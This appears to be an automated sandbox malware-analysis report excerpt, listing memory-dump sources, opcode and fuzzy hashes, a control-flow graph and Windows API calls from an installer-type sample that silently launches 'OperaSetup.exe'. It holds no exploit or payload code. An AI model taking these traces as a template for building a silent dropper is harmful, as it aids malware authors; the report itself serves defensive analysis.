                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                                                            • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 779 40705f-407063 780 407081-4070c4 779->780 781 407065-40707c 779->781 782 40742c-407441 780->782 781->782 783 407443-407459 782->783 784 40745b-407471 782->784 785 407474-40747b 783->785 784->785 786 4074a2-4074ae 785->786 787 40747d-407481 785->787 793 406c53 786->793 794 40765b 786->794 788 407630-40763a 787->788 789 407487-40749f 787->789 792 407646-407659 788->792 789->786 795 40765e-407662 792->795 796 406c5a-406c5e 793->796 797 406d9a-406dbb 793->797 798 406cff-406d03 793->798 799 406d6f-406d73 793->799 794->795 796->792 800 406c64-406c71 796->800 797->782 803 406d09-406d22 798->803 804 4075af-4075b9 798->804 801 406d79-406d8d 799->801 802 4075be-4075c8 799->802 800->794 806 406c77-406cbd 800->806 807 406d90-406d98 801->807 802->792 805 406d25-406d29 803->805 804->792 805->798 808 406d2b-406d31 805->808 809 406ce5-406ce7 806->809 810 406cbf-406cc3 806->810 807->797 807->799 811 406d33-406d3a 808->811 812 406d5b-406d6d 808->812 815 406cf5-406cfd 809->815 816 406ce9-406cf3 809->816 813 406cc5-406cc8 GlobalFree 810->813 814 406cce-406cdc GlobalAlloc 810->814 817 406d45-406d55 GlobalAlloc 811->817 818 406d3c-406d3f GlobalFree 811->818 812->807 813->814 814->794 819 406ce2 814->819 815->805 816->815 816->816 817->794 817->812 818->817 819->809
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                                                            • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                                                                                                                                            • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                                                            • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                                                            • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                                                                                                                                            • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                                                            • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                                                            • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                                                            • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 334405425-0
                                                                                                                                                                            • Opcode ID: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
                                                                                                                                                                            • Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
                                                                                                                                                                            • Opcode Fuzzy Hash: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
                                                                                                                                                                            • Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalFree.KERNELBASE(00861CF8), ref: 00401C30
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                                                            • API String ID: 3394109436-3663954162
                                                                                                                                                                            • Opcode ID: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                                                            • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                              • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1655745494-0
                                                                                                                                                                            • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                                                            • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                                                            • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                                                            • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                                                            • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                                                            • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                                              • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1892508949-0
                                                                                                                                                                            • Opcode ID: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                                                            • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                                                            • Opcode Fuzzy Hash: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                            • Opcode ID: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
                                                                                                                                                                            • Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
                                                                                                                                                                            • Opcode Fuzzy Hash: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C46
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                            • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                                                                                                                                            • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
